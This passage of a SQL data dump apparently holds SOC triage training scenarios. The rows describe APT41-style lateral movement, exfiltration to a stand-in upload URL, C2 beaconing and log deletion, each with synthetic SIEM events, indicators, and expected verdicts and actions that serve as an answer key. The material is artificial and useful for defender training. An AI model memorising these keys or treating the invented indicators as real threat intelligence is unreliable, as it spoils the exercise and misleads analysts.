Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(533, 'Lateral Movement: Expanding Network Footprint', 'high', 'User Behavior Analytics', 'Using stolen credentials, the attackers move laterally across the network to identify high-value targets. This step involves credential dumping to facilitate further infiltration into the network.', 'Credential Dumping', 'T1003', 1, 'new', 68, '{\"timestamp\":\"2023-10-15T14:48:00Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.15.23\",\"username\":\"jdoe\",\"process_name\":\"lsass.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_description\":\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\",\"host\":\"WIN-SERVER01\",\"detected_by\":\"User Behavior Analytics\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in unusual access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to a known credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. 
Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. 
Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(534, 'Exfiltration: Data Harvesting', 'high', 'Data Loss Prevention', 'APT41 begins exfiltrating data from compromised systems, focusing on valuable intellectual property and sensitive user data.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_source\":\"Data Loss Prevention\",\"src_ip\":\"10.20.30.40\",\"dst_ip\":\"203.0.113.45\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"Sensitive_Project_Documents.zip\",\"user\":\"jdoe\",\"action\":\"file_transfer\",\"protocol\":\"HTTPS\",\"destination_url\":\"https://malicious-site.example.com/upload\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"10.20.30.40\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT41 exfiltration tool.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://malicious-site.example.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL used for data exfiltration by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss 
Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | 
head 100\"}}', 0),
(535, 'Target Identification: Specific MAC Addresses', 'high', 'Threat Intelligence Feeds', 'The attackers are utilizing malware to identify and target specific MAC addresses, indicating a precise strike within the broader attack. This operation highlights the advanced capabilities of APT41 in conducting targeted attacks.', 'Targeted Attack', 'T1087 - Account Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:32Z\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.45\",\"malware_hash\":\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\",\"malware_filename\":\"CCleaner_v5.33.exe\",\"target_mac\":\"00:1A:2B:3C:4D:5E\",\"user\":\"jdoe\",\"action\":\"Identify\",\"result\":\"Specific MAC address identified within infected network\",\"attack_type\":\"Supply Chain Attack\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Shodan\",\"verdict\":\"malicious\",\"details\":\"IP associated with past APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host identified in attack\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with CCleaner supply chain attack\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"CCleaner_v5.33.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious file used in supply chain attack\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(536, 'Command and Control: Maintaining Communication', 'high', 'Network Traffic Analysis', 'Network traffic analysis has identified persistent communication between internal hosts and known APT41 command and control servers. The backdoors on compromised systems maintain communication to ensure ongoing control. Indicators such as IPs, hashes, and domains have been flagged.', 'C2 Communication', 'T1105', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:21:45Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"filename\":\"backdoor.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"domain\":\"control.apt41-malicious.com\",\"username\":\"jdoe\",\"malware_family\":\"APT41_Backdoor\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_management\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash of the backdoor file used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"control.apt41-malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Malicious domain used for C2 communication by 
APT41.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with APT41 backdoor.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Username of the compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(537, 'Cleanup: Covering Tracks', 'high', 'File Integrity Monitoring', 'APT41 has been detected employing anti-forensic techniques to erase traces of their attack. This includes the deletion of log files and alteration of timestamps to cover their tracks, complicating detection and analysis efforts.', 'Anti-Forensic Techniques', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:14:23Z\",\"event_type\":\"file_modification\",\"user\":\"malicious_actor\",\"affected_files\":[\"/var/log/auth.log\",\"/var/log/syslog\"],\"modification_type\":\"delete\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"hashes\":[\"e99a18c428cb38d5f260853678922e03\",\"d41d8cd98f00b204e9800998ecf8427e\"],\"associated_username\":\"admin_user\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in the incident.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"clean\",\"details\":\"Empty file hash indicating possible log file deletion.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User 
